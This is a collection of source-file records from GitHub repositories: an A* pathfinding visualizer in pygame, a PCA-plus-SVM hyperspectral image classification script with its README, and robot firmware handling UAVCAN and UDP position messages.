neighbour = Cell(down)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 10\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open 
list is list\n if self.is_valid(right):\n neighbour = Cell(right)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 10\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n\n if self.is_valid(left):\n neighbour = Cell(left)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 10\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n \n if not self.open_is_heapq:\n self.open = sorted(self.open) # if the open list is list\n\n def find(self):\n no_path = True # flag\n\n cell = Cell(self.start) # the first cell is starting point\n if self.open_is_heapq:\n heapq.heappush(self.open, cell) # push into the priority queue\n else:\n self.open.append(cell)\n\n while True: # find the shortest path\n for e in pg.event.get():\n if e.type == QUIT: # terminate the program\n pg.quit()\n sys.exit()\n\n if not self.open: break # if the open list is empty, break\n # print(\"---------------------\")\n # print(\"current = \", cell.coord)\n # print(\"---------------------\")\n # for o in self.open:\n # print(o.coord, o.F, end = \" \")\n # print(\"\\n---------------------\") # debugging\n \n if self.open_is_heapq:\n cell = heapq.heappop(self.open) # pop one cell with the smallest F-cost in the open list\n else:\n cell = self.open.pop(0) # if the open list is list\n\n # draw the process\n for o in self.open:\n if not (o.coord == self.start or o.coord == self.end):\n o.draw(YELLOW)\n for c in self.closed:\n if not (c.coord == self.start or c.coord == self.end):\n c.draw(ORANGE)\n if not (cell.coord == self.start or cell.coord == self.end):\n cell.draw(BLUE)\n\n pg.time.delay(70) # delay\n\n self.closed.append(cell) # put the cell in the closed list\n if cell.coord == self.end: # if cell.coord is the destination(e.g. 
the ending point is in closed list), break\n no_path = False # found path \n break\n\n self.neighbours(cell) # visit neighbors\n \n pg.time.delay(1000) # delay 1 sec\n \n if no_path: # if not found, return\n return\n\n while True: # if found the path, trace the parent coord\n if cell.coord == self.start: # if cell.coord is the starting point, done\n break\n \n # draw the found path\n if cell.coord != self.end:\n cell.draw(GREY)\n\n for exist in self.closed:\n if cell.parent == exist.coord:\n cell = exist\n break\n \n pg.time.delay(1500) # delay 1.5 sec\n\nclass Option:\n def __init__(self, coord, text):\n self.coord = coord\n self.text = text\n self.state = False # on, off\n self.circle = None # for event\n\n def txt(self): # set text\n x, y = self.coord\n x = (gridwidth + x + 1) * cellsize\n y = y * cellsize + 10\n \n obj = optionfont.render(self.text, True, WHITE)\n obj_rect = obj.get_rect()\n obj_rect.topleft = x, y\n screen.blit(obj, obj_rect)\n\n def draw(self):\n x, y = self.coord\n x = (gridwidth + x) * cellsize + (cellsize // 2)\n y = y * cellsize + (cellsize // 2)\n\n self.txt()\n if self.state:\n self.circle = pg.draw.circle(screen, RED, (x, y), cellsize // 4)\n else:\n self.circle = pg.draw.circle(screen, WHITE, (x, y), cellsize // 4)\n\n def is_clicked(self, pos):\n if self.circle.collidepoint(pos):\n return True\n return False\n\n# --------------------------------------------\ndef add(one, another): \n result = []\n for a, b in zip(one, another):\n result.append(a + b)\n return result\n\n# --------------------------------------------\ndef txt(pos, text):\n x, y = pos\n x = (gridwidth + x) * cellsize + 10\n y = y * cellsize + 10\n obj = optionfont.render(text, True, WHITE)\n obj_rect = obj.get_rect()\n obj_rect.topleft = x, y\n screen.blit(obj, obj_rect)\n\ndef draw_grid(grid):\n for x in range(len(grid)):\n for y in range(len(grid[0])):\n if grid[x][y] == WALL:\n pg.draw.rect(screen, BLACK, (x * cellsize, y * cellsize, cellsize, cellsize))\n elif grid[x][y] == PATH:\n pg.draw.rect(screen, WHITE, (x * cellsize, y * cellsize, cellsize, cellsize))\n pg.draw.rect(screen, BLACK, (x * cellsize, y * cellsize, cellsize, cellsize), 1) # outline\n elif grid[x][y] == START:\n pg.draw.rect(screen, RED, (x * cellsize, y * cellsize, cellsize, cellsize))\n pg.draw.rect(screen, BLACK, (x * cellsize, y * cellsize, cellsize, cellsize), 1)\n elif grid[x][y] == END:\n pg.draw.rect(screen, GREEN, (x * cellsize, y * cellsize, cellsize, cellsize))\n pg.draw.rect(screen, BLACK, (x * cellsize, y * cellsize, cellsize, cellsize), 1)\n\ndef draw_menu(options, diagonal, weight, open_is_heapq):\n for option in options: # draw options\n option.draw()\n diagonal.draw()\n open_is_heapq.draw()\n\n txt([0, 10], \"press left\") # explain how to control weight\n txt([0, 11], \", right key\")\n weighttxt = \"weight : \"\n txt([0, 12], weighttxt + str(weight))\n txt([0, gridheight - 1], \" PRESS ENTER\") # explain how to start\n\n# --------------------------------------------\ndef execute():\n # initialize grid settings\n grid = [[PATH for y in range(gridheight)] for x in range(gridwidth)] # create\n grid[0][0] = START # set the starting point\n start = 0, 0\n grid[gridwidth - 1][gridheight - 1] = END # set the ending point\n end = gridwidth - 1, gridheight - 1\n \n # initialize menu\n manhattan = Option([0, 1], \"manhattan\")\n manhattan.state = True\n using = manhattan.text\n euclidean = Option([0, 2], \"euclidean\")\n chebyshev = Option([0, 3], \"chebyshev\")\n octile = Option([0, 4], \"octile\")\n options = 
[manhattan, euclidean, chebyshev, octile]\n diagonal = Option([0, 7], \"diagonal\")\n diagonal.state = True\n weight = 10\n open_is_heapq = Option([0, 8], \"using heapq\")\n open_is_heapq.state = False\n\n # clicked \n is_cell_clicked = False\n is_start_clicked = False\n is_end_clicked = False\n change = []\n\n is_running = True\n while is_running:\n pos = pg.mouse.get_pos()\n x, y = (pos[0] // cellsize, pos[1] // cellsize)\n\n for e in pg.event.get():\n if e.type == QUIT: # terminate the program\n pg.quit()\n sys.exit()\n if e.type == KEYDOWN:\n if e.key == K_RETURN: # find the shortest path \n Astar(grid, start, end, weight, using, diagonal.state, open_is_heapq.state).find()\n\n elif e.key == K_LEFT: # weight --\n if 1 < weight:\n weight = weight - 2\n elif e.key == K_RIGHT: # weight ++\n if weight < weightlimit - 1:\n weight = weight + 2\n\n elif e.type == MOUSEBUTTONDOWN: # click\n if x < gridwidth:\n if (x, y) == start:\n is_start_clicked = True\n elif (x, y) == end:\n is_end_clicked = True\n else:\n change.append([x, y])\n if grid[x][y] == WALL:\n grid[x][y] = PATH\n elif grid[x][y] == PATH:\n grid[x][y] = WALL \n is_cell_clicked = True \n\n for option in options: # radio button\n if option.is_clicked(pos):\n option.state = True\n using = option.text\n for opt in options:\n if opt.coord != option.coord:\n opt.state = False\n\n if diagonal.is_clicked(pos): # check box\n if diagonal.state:\n diagonal.state = False\n else:\n diagonal.state = True\n \n if open_is_heapq.is_clicked(pos):\n if open_is_heapq.state:\n open_is_heapq.state = False\n else:\n open_is_heapq.state = True\n\n elif e.type == MOUSEMOTION: # move\n if x < gridwidth:\n if is_cell_clicked:\n if [x, y] not in change: \n change.append([x, y])\n if grid[x][y] == WALL:\n grid[x][y] = PATH\n elif grid[x][y] == PATH:\n grid[x][y] = WALL\n elif is_start_clicked and not ((x, y) == end):\n if grid[x][y] != WALL:\n grid[start[0]][start[1]] = PATH\n grid[x][y] = START\n start = x, y\n elif is_end_clicked and not ((x, y) == start):\n if grid[x][y] != WALL:\n grid[end[0]][end[1]] = PATH\n grid[x][y] = END\n end = x, y \n\n elif e.type == MOUSEBUTTONUP: # release\n if is_cell_clicked:\n change = []\n is_cell_clicked = False\n elif is_start_clicked:\n is_start_clicked = False\n elif is_end_clicked:\n is_end_clicked = False\n \n screen.fill(BLACK) # background\n\n draw_grid(grid)\n draw_menu(options, diagonal, weight, open_is_heapq)\n\n pg.display.flip() # update the screen\n pg.time.Clock().tick(FPS) # fps\n \n# --------------------------------------------\nif __name__ == \"__main__\":\n execute()"
},
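For reference, the four heuristics selectable in the menu reduce to the distance functions below, extracted from `calculate_heuristic` above; `dx` and `dy` stand for the (already weight-scaled) absolute coordinate differences to the goal:

```python
import math

def manhattan(dx, dy):
    return dx + dy

def euclidean(dx, dy):
    return math.sqrt(dx ** 2 + dy ** 2)

def chebyshev(dx, dy):
    return max(dx, dy)

def octile(dx, dy):
    # Diagonal steps cost sqrt(2), straight steps cost 1.
    return min(dx, dy) * math.sqrt(2) + max(dx, dy) - min(dx, dy)

print(octile(3, 4))  # 3*sqrt(2) + (4 - 3) ≈ 5.24
```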
{
"alpha_fraction": 0.5574935674667358,
"alphanum_fraction": 0.700904369354248,
"avg_line_length": 42,
"blob_id": "1d6e4c4bda1a28ee9fe1d5699900579c7ecb4631",
"content_id": "f1597d1e95762f47faf81971bbc5607cbcad9165",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1548,
"license_type": "no_license",
"max_line_length": 561,
"num_lines": 36,
"path": "/README.md",
"repo_name": "oognuyh/astar-visualization",
"src_encoding": "UTF-8",
"text": "# **A Star Algorithm Visualization**\nThis is a program implemented to learn more about A* algorithm.\n\n## Features\n * Choose one of four heuristics below \n |Manhattan|Chebyshev|Octile|Euclidean|\n |:-------:|:-------:|:----:|:-------:|\n |<img src=\"https://user-images.githubusercontent.com/48203569/100442237-0688ab80-30eb-11eb-8159-ddaddccaab13.png\" height=\"120\" width=\"250\">|<img src=\"https://user-images.githubusercontent.com/48203569/100442242-07214200-30eb-11eb-8490-97e1d073b24e.png\" height=\"120\" width=\"250\">|<img src=\"https://user-images.githubusercontent.com/48203569/100442249-07b9d880-30eb-11eb-9e47-f317d065d9a7.png\" height=\"120\" width=\"250\">|<img src=\"https://user-images.githubusercontent.com/48203569/100442244-07214200-30eb-11eb-81b2-160d02ef6484.png\" height=\"120\" width=\"250\">|\n * Control weight\n * Drag to create/remove a wall\n * Choose between heap queue and list for open/closed list data structure\n * Allow diagonal movement\n\n## Usage\n ``` \n // if pygame is not installed\n pip3 install pygame\n \n // visual_astar.py and PrStart.ttf(Font) files must be in the same path\n python3 visual_astar.py\n ```\n \n * Color \n * Red : start point\n * Green : end point\n * Blue : current point\n * Yellow : points in open list\n * Orange : points in closed list\n * Grey : Path\n * Black : Wall\n\n## Demo\n <img src=\"https://user-images.githubusercontent.com/48203569/100443725-94659600-30ed-11eb-996a-effe05e8c2f1.gif\" height=\"500\" width=\"500\">\n\n## Library used\n * [pygame](https://www.pygame.org/news)\n"
}
] | 2 |
Hariharan20081998/Classification-of-hyperspectral-imaging-using-PCA-and-SVM
|
https://github.com/Hariharan20081998/Classification-of-hyperspectral-imaging-using-PCA-and-SVM
|
ae7a71528d052060791412f6bbc4898e56069a4f
|
92fc899ef5e5481aae1205e466af59071ad19768
|
29dea6e974dde5983883fd52a971d1a93bd182c2
|
refs/heads/master
| 2020-07-01T18:01:13.255777 | 2019-12-14T13:13:38 | 2019-12-14T13:13:38 | 201,247,431 | 0 | 0 | null | 2019-08-08T11:49:24 | 2019-05-09T09:11:06 | 2019-05-09T09:11:04 | null |
[
{
"alpha_fraction": 0.7865961194038391,
"alphanum_fraction": 0.7989417910575867,
"avg_line_length": 55.70000076293945,
"blob_id": "a4a541612d2f616caf6c14cdfea2232897937730",
"content_id": "44eb47ed8b5ff27875083dba8965a0b716feceee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 398,
"num_lines": 10,
"path": "/README.md",
"repo_name": "Hariharan20081998/Classification-of-hyperspectral-imaging-using-PCA-and-SVM",
"src_encoding": "UTF-8",
"text": "# Classification-of-hyperspectral-imaging-using-PCA-and-SVM\n\nThis work is based on Hyperspectral Image 'AVIRIS-Indian Pines'.At first Principal Component Analysis was performed in order to reduce the high dimension of the image. After that the image was splitted into 80:20 training and testing ratio. After that support vectore machine was used to classify the dataset.The RBF kernel was used for SVM .The parameter of rbf kernel was tuned via GridSearchCV. \n\n\nReuirement: \n\n1.scikit-learn -https://scikit-learn.org/stable/\n\nThe whole work is done using Python 3.6.\n"
},
{
"alpha_fraction": 0.724438488483429,
"alphanum_fraction": 0.7418705821037292,
"avg_line_length": 21.406015396118164,
"blob_id": "8c615d853b0f23bfd5d73488143ce5ade4f28cb7",
"content_id": "e01e0b98e9f563e7c4bf0a5fa7dec219d2bf2717",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2983,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 133,
"path": "/Begining.py",
"repo_name": "Hariharan20081998/Classification-of-hyperspectral-imaging-using-PCA-and-SVM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 11 08:34:07 2019\n\n@author: Sajal\n\"\"\"\n\nimport numpy as np\nfrom sklearn.decomposition import PCA\nimport scipy.io as sio\nnp.random.seed(7)\n\nData=sio.loadmat('Indian_pines_corrected.mat')['indian_pines_corrected']\nLabel=sio.loadmat('Indian_pines_gt.mat')['indian_pines_gt']\n\nData=np.reshape(Data,(Data.shape[0]*Data.shape[1],Data.shape[2]))\n\nLabel=np.reshape(Label,(Label.shape[0]*Label.shape[1]))\n\nLabels,counts=np.unique(Label,return_counts=True)\n\nData=Data[Label>0,:]\nLabel=Label[Label>0]\n\nLabels,counts=np.unique(Label,return_counts=True)\n\n\nLabels,counts=np.unique(Label,return_counts=True)\n\n#Standardizing the values \n\"\"\"\nfrom sklearn import preprocessing\nscaler = preprocessing.StandardScaler().fit(Data) \nData= scaler.transform(Data)\n\n\"\"\"\n\n#Train-Test Split\n\nfrom sklearn.model_selection import train_test_split\n\ntestRatio=0.20\n\nX_train, X_test, y_train, y_test = train_test_split(Data, Label, test_size=testRatio, random_state=345,\n stratify=Label)\n\n\n\n#Applying Scalar to train and test Dataset\n\nfrom sklearn import preprocessing\nscaler = preprocessing.StandardScaler().fit(X_train) \nX_train= scaler.transform(X_train)\nX_test=scaler.transform(X_test)\n\n\n\n\n\n\n\n#Applying PCA \n\n\nimport matplotlib.pyplot as plt\npca = PCA(n_components=30)\npca.fit_transform(X_train)\nnewspace=pca.components_\nnewspace=newspace.transpose()\nX_train=np.matmul(X_train,newspace)\nprint(pca.n_components_)\nplt.figure()\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.xlabel('Number of Components')\nplt.ylabel('Variance (%)') #for each component\nplt.title('Inidian_pines Dataset Explained Variance')\nplt.show()\nX_test=np.matmul(X_test,newspace)\n\n\n#Appplying SVM \n\nfrom sklearn.svm import SVC\n\nclf = SVC(C=10,gamma=0.01)\n\nclf.fit(X_train, y_train)\n\n#model tuning\n\nimport time\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\n\nstart=time.time()\nC_range = np.logspace(-2, 10, 13)\ngamma_range=np.logspace(-9, 3, 13)\nparam_grid = dict(C=C_range,gamma=gamma_range)\ncv = StratifiedShuffleSplit(n_splits=3, test_size=0.2, random_state=42)\ngrid = GridSearchCV(clf, param_grid, cv=cv, scoring='accuracy', return_train_score=False)\ngrid.fit(X_train,y_train)\nprint(grid.best_score_)\nprint(grid.best_params_)\nend=time.time()\nprint(end-start)\n\n\n\nimport pickle\npickle_out = open(\"Firstgrid16.pickle\",\"wb\")\npickle.dump(grid, pickle_out)\npickle_out.close()\n\npickle_in = open(\"Firstgrid16.pickle\",\"rb\")\nexample_dict = pickle.load(pickle_in)\nexample_dict.best_estimator_\n\n#Predicting accuracy\ny_pred=clf.predict(X_test) \nfrom sklearn.metrics import accuracy_score\nacc=accuracy_score(y_test, y_pred)\n\n\nfrom sklearn.metrics import confusion_matrix\ncm=confusion_matrix(y_test,y_pred)\n\n\nfrom sklearn.metrics import cohen_kappa_score\nprint(cohen_kappa_score(y_test,y_pred))\n\nfrom sklearn.metrics import cohen_kappa_score\nprint(cohen_kappa_score(y_test,y_pred))\n\n\n\n"
}
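The script above standardizes, projects with PCA, and grid-searches an RBF SVM as separate steps. The same flow can be written more compactly with a scikit-learn `Pipeline`, which also re-fits the scaler and PCA inside each cross-validation fold; a sketch using the script's own parameter ranges (`X_train`/`y_train` assumed to come from the 80:20 split above):

```python
import numpy as np
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.svm import SVC
from sklearn.model_selection import GridSearchCV, StratifiedShuffleSplit

# Same stages as the script, chained into one estimator.
pipe = Pipeline([
    ('scale', StandardScaler()),
    ('pca', PCA(n_components=30)),
    ('svm', SVC(kernel='rbf')),
])

param_grid = {
    'svm__C': np.logspace(-2, 10, 13),
    'svm__gamma': np.logspace(-9, 3, 13),
}
cv = StratifiedShuffleSplit(n_splits=3, test_size=0.2, random_state=42)
grid = GridSearchCV(pipe, param_grid, cv=cv, scoring='accuracy')
# grid.fit(X_train, y_train)  # X_train/y_train from the split above
```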
] | 2 |
SnaKyEyeS/robot-software
|
https://github.com/SnaKyEyeS/robot-software
|
0d3ea982c483e4d7eda9ecefffbf3dbfee92fd59
|
69b14d75d416959d5eae61849ae2701826470eea
|
86b5e613cb699f905426c6b514dd07f690425f7c
|
refs/heads/master
| 2022-12-03T10:10:59.466584 | 2020-06-12T17:49:25 | 2020-06-24T21:53:45 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6712891459465027,
"avg_line_length": 28.953845977783203,
"blob_id": "762f8a690c42da7321e915916986f39e95d769c1",
"content_id": "7599fca2a00382b95df5b5473a2b7cca6fca9484",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1947,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 65,
"path": "/master-firmware/src/can/uwb_position_handler.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <uavcan/uavcan.hpp>\n#include <cvra/uwb_beacon/TagPosition.hpp>\n#include <aversive/math/geometry/vect_base.h>\n#include <error/error.h>\n#include \"main.h\"\n#include \"uwb_position_handler.h\"\n#include \"base/base_controller.h\"\n#include \"control_panel.h\"\n#include \"protobuf/beacons.pb.h\"\n#include <timestamp/timestamp.h>\n\nusing TagPosition = cvra::uwb_beacon::TagPosition;\n\nTOPIC_DECL(allied_position_topic, AlliedPosition);\nTOPIC_DECL(last_panel_contact_topic, Timestamp);\n\nstatic uavcan::LazyConstructor<uavcan::Publisher<TagPosition>> publisher;\n\nstatic void position_cb(const uavcan::ReceivedDataStructure<TagPosition>& msg)\n{\n AlliedPosition pos;\n pos.x = msg.x;\n pos.y = msg.y;\n pos.timestamp.us = timestamp_get();\n\n // This is the panel\n if (msg.x < -1000) {\n Timestamp msg;\n msg.us = timestamp_get();\n messagebus_topic_publish(&last_panel_contact_topic.topic, &msg, sizeof(msg));\n } else {\n messagebus_topic_publish(&allied_position_topic.topic, &pos, sizeof(pos));\n }\n}\n\nint uwb_position_handler_init(uavcan::INode& node)\n{\n messagebus_advertise_topic(&bus, &allied_position_topic.topic, \"/allied_position\");\n messagebus_advertise_topic(&bus, &last_panel_contact_topic.topic, \"/panel_contact_us\");\n\n static uavcan::Subscriber<TagPosition> position_sub(node);\n auto res = position_sub.start(position_cb);\n\n if (res != 0) {\n return res;\n }\n\n publisher.construct<uavcan::INode&>(node);\n\n static uavcan::Timer periodic_timer(node);\n periodic_timer.setCallback([](const uavcan::TimerEvent& event) {\n (void)event;\n TagPosition msg;\n {\n absl::MutexLock l(&robot.lock);\n msg.x = position_get_x_double(&robot.pos);\n msg.y = position_get_y_double(&robot.pos);\n }\n publisher->broadcast(msg);\n });\n\n periodic_timer.startPeriodic(uavcan::MonotonicDuration::fromMSec(300));\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6679920554161072,
"alphanum_fraction": 0.6779323816299438,
"avg_line_length": 20.869565963745117,
"blob_id": "19f75d910696373c412656bd28b100c1b532478b",
"content_id": "88e9008cd097d98ba4773783aca3b334f7229f0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 503,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 23,
"path": "/actuator-firmware/src/uavcan/feedback_publisher.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <ch.h>\n#include <hal.h>\n#include \"board.h\"\n#include \"feedback_publisher.h\"\n#include <cvra/actuator/Feedback.hpp>\n#include \"analog_input.h\"\n\nvoid feedback_publish(uavcan::INode& node)\n{\n static uavcan::Publisher<cvra::actuator::Feedback> pub(node);\n float analog[2];\n\n analog_input_read(analog);\n\n cvra::actuator::Feedback msg;\n\n msg.analog_input[0] = analog[0];\n msg.analog_input[1] = analog[1];\n\n msg.digital_input = board_digital_input_read();\n\n pub.broadcast(msg);\n}\n"
},
{
"alpha_fraction": 0.6409969329833984,
"alphanum_fraction": 0.644917368888855,
"avg_line_length": 24.32624053955078,
"blob_id": "a63a1c2d93c771d0d5424b2b4ce617a0142157b7",
"content_id": "ebd4c92fc7031a1178afccb723fefb045e8fcaa2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3571,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 141,
"path": "/master-firmware/src/can/can_uwb_ip_netif.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include \"can_uwb_ip_netif.hpp\"\n\n#include <ch.h>\n#include <hal.h>\n\n#include <cvra/uwb_beacon/DataPacket.hpp>\n\n#include <lwip/opt.h>\n#include <lwip/def.h>\n#include <lwip/mem.h>\n#include <lwip/pbuf.h>\n#include <lwip/sys.h>\n#include <lwip/stats.h>\n#include <lwip/snmp.h>\n#include <lwip/tcpip.h>\n#include <netif/etharp.h>\n#include <lwip/netifapi.h>\n\n#if LWIP_DHCP\n#include <lwip/dhcp.h>\n#endif\nusing DataPacket = cvra::uwb_beacon::DataPacket;\n\n/* Semaphores synchronizing communication between the lwip thread and the\n * UAVCAN thread. */\nstatic BSEMAPHORE_DECL(sem_tx_ready, true);\nstatic BSEMAPHORE_DECL(sem_tx_done, true);\n\nstatic DataPacket tx_packet, rx_packet;\n\nstatic MUTEX_DECL(lock_rx_packet);\nstatic BSEMAPHORE_DECL(sem_rx_available, true);\nstatic EVENTSOURCE_DECL(event_rx);\n\nstatic uavcan::LazyConstructor<uavcan::Publisher<DataPacket>> data_pub;\n\nstatic err_t low_level_output(struct netif* netif, struct pbuf* p);\n\nstatic void data_packet_cb(const uavcan::ReceivedDataStructure<DataPacket>& msg)\n{\n chMtxLock(&lock_rx_packet);\n rx_packet = msg;\n chMtxUnlock(&lock_rx_packet);\n chBSemSignal(&sem_rx_available);\n\n /* Wakes up IP thread */\n chEvtBroadcast(&event_rx);\n}\n\nerr_t lwip_uwb_ip_netif_init(struct netif* interface)\n{\n osalDbgAssert((interface != NULL), \"netif != NULL\");\n interface->state = NULL;\n interface->name[0] = 'w';\n interface->name[1] = 'l';\n\n /* Must be smaller than 1k */\n interface->mtu = 750;\n interface->hwaddr_len = ETHARP_HWADDR_LEN;\n interface->flags = NETIF_FLAG_BROADCAST | NETIF_FLAG_ETHARP | NETIF_FLAG_LINK_UP;\n\n interface->output = etharp_output;\n interface->linkoutput = low_level_output;\n\n return ERR_OK;\n}\n\nint can_uwb_ip_netif_init(uavcan::INode& node)\n{\n static uavcan::Subscriber<DataPacket> subscriber(node);\n data_pub.construct<uavcan::INode&>(node);\n\n return subscriber.start(data_packet_cb);\n}\n\nstatic err_t low_level_output(struct netif* netif, struct pbuf* p)\n{\n (void)netif;\n /* First, copy all the data */\n tx_packet = DataPacket();\n for (auto q = p; q != NULL; q = q->next) {\n uint8_t* buf = reinterpret_cast<uint8_t*>(q->payload);\n for (auto i = 0u; i < q->len; i++) {\n tx_packet.data.push_back(buf[i]);\n }\n }\n\n /* Signal the UAVCAN thread that a DataPacket is ready */\n chBSemSignal(&sem_tx_ready);\n\n /* Finally, wait for the UAVCAN to tell us we are ready. */\n chBSemSignal(&sem_tx_done);\n\n return ERR_OK;\n}\n\nbool lwip_uwb_ip_read(struct netif* netif, struct pbuf** pbuf)\n{\n (void)netif;\n if (chBSemWaitTimeout(&sem_rx_available, TIME_IMMEDIATE) != MSG_OK) {\n return false;\n }\n\n chMtxLock(&lock_rx_packet);\n\n auto len = rx_packet.data.size();\n *pbuf = pbuf_alloc(PBUF_RAW, len, PBUF_POOL);\n\n auto can_msg_index = 0u;\n\n for (auto q = *pbuf; q != NULL; q = q->next) {\n uint8_t* buf = reinterpret_cast<uint8_t*>(q->payload);\n for (auto j = 0u; j < q->len; j++) {\n buf[j] = rx_packet.data[can_msg_index];\n can_msg_index++;\n }\n }\n\n chMtxUnlock(&lock_rx_packet);\n\n return true;\n}\n\nint can_uwb_ip_netif_spin(uavcan::INode& node)\n{\n (void)node;\n /* Check if data is available for transmit */\n if (chBSemWaitTimeout(&sem_tx_ready, TIME_IMMEDIATE) == MSG_OK) {\n data_pub->broadcast(tx_packet);\n\n /* Signal the lwip thread that we are done with this. */\n chBSemSignal(&sem_tx_done);\n }\n\n return 0;\n}\n\nevent_source_t* can_uwb_ip_netif_get_event_source(void)\n{\n return &event_rx;\n}\n"
},
{
"alpha_fraction": 0.6312292218208313,
"alphanum_fraction": 0.6384778022766113,
"avg_line_length": 27.059322357177734,
"blob_id": "dc3c44db8aea70831bda70f4238a28224d0a9f02",
"content_id": "ac6dde254817cd6dd2074d2b0e49efc3404489a3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3311,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 118,
"path": "/master-firmware/src/ally_position_service.c",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <lwip/api.h>\n#include <msgbus_protobuf.h>\n#include \"protobuf/ally_position.pb.h\"\n#include <pb_encode.h>\n#include <pb_decode.h>\n#include \"base/base_controller.h\"\n#include \"ally_position_service.h\"\n\n#include <parameter/parameter.h>\n#include \"main.h\"\n#include \"control_panel.h\"\n\n#define ALLY_POSITION_PORT 3000\n\nstatic parameter_t ally_ip;\nchar ally_ip_buffer[IP4ADDR_STRLEN_MAX];\n\nstatic int ip_from_parameter(parameter_t* p, ip4_addr_t* addr)\n{\n char buffer[IP4ADDR_STRLEN_MAX];\n parameter_string_get(p, buffer, sizeof(buffer));\n int success = ip4addr_aton(buffer, addr);\n if (success == 0) {\n WARNING(\"\\\"%s\\\" is not a valid IP.\", buffer);\n }\n\n return success;\n}\n\nstatic void position_send_thread(void* p)\n{\n (void)p;\n\n chRegSetThreadName(__FUNCTION__);\n\n struct netconn* conn;\n conn = netconn_new(NETCONN_UDP);\n\n static uint8_t object_buf[AllyPosition_size];\n\n while (true) {\n AllyPosition pos;\n struct netbuf* buf;\n pb_ostream_t stream;\n\n pos.x = position_get_x_float(&robot.pos);\n pos.y = position_get_y_float(&robot.pos);\n pos.a = position_get_a_rad_float(&robot.pos);\n\n /* Encode the message as Protobuf and send it */\n stream = pb_ostream_from_buffer(object_buf, sizeof(object_buf));\n pb_encode(&stream, AllyPosition_fields, &pos);\n\n buf = netbuf_new();\n\n netbuf_ref(buf, object_buf, sizeof(object_buf));\n\n /* TODO: Take that from parameter tree */\n ip_addr_t addr;\n if (parameter_defined(&ally_ip)) {\n ip_from_parameter(&ally_ip, &addr);\n\n netconn_sendto(conn, buf, &addr, ALLY_POSITION_PORT);\n }\n netbuf_delete(buf);\n\n /* Publish at 10 Hz */\n chThdSleepMilliseconds(100);\n }\n}\n\nTOPIC_DECL(ally_position_topic, AllyPosition);\n\nstatic void position_receive_thread(void* p)\n{\n (void)p;\n chRegSetThreadName(__FUNCTION__);\n\n struct netconn* conn;\n\n messagebus_advertise_topic(&bus, &ally_position_topic.topic, \"/ally_pos\");\n\n conn = netconn_new(NETCONN_UDP);\n chDbgAssert(conn != NULL, \"Cannot create a connection object\");\n netconn_bind(conn, IPADDR_ANY, ALLY_POSITION_PORT);\n\n while (true) {\n struct netbuf* buf;\n static uint8_t pos_buf[AllyPosition_size];\n AllyPosition pos;\n pb_istream_t istream;\n\n /* Read a datagram */\n if (netconn_recv(conn, &buf) != ERR_OK) {\n continue;\n }\n\n netbuf_copy(buf, &pos_buf, sizeof(pos_buf));\n\n istream = pb_istream_from_buffer(pos_buf, sizeof(pos_buf));\n pb_decode(&istream, AllyPosition_fields, &pos);\n\n control_panel_toggle(LED_READY);\n messagebus_topic_publish(&ally_position_topic.topic, &pos, sizeof(pos));\n\n netbuf_delete(buf);\n }\n}\n\nvoid ally_position_start(void)\n{\n static THD_WORKING_AREA(send_wa, 2048);\n static THD_WORKING_AREA(receive_wa, 2048);\n parameter_namespace_t* ip_ns = parameter_namespace_find(&global_config, \"/ip\");\n parameter_string_declare(&ally_ip, ip_ns, \"ally_address\", ally_ip_buffer, sizeof(ally_ip_buffer));\n chThdCreateStatic(send_wa, sizeof(send_wa), NORMALPRIO, position_send_thread, NULL);\n chThdCreateStatic(receive_wa, sizeof(receive_wa), NORMALPRIO, position_receive_thread, NULL);\n}\n"
},
{
"alpha_fraction": 0.5731584429740906,
"alphanum_fraction": 0.5817356109619141,
"avg_line_length": 21.522727966308594,
"blob_id": "a28a845a77cc9b039b5dadf6811c3e28681d4b7a",
"content_id": "6c116c982c34613b9bbfa56ae3c74107f317d2a6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
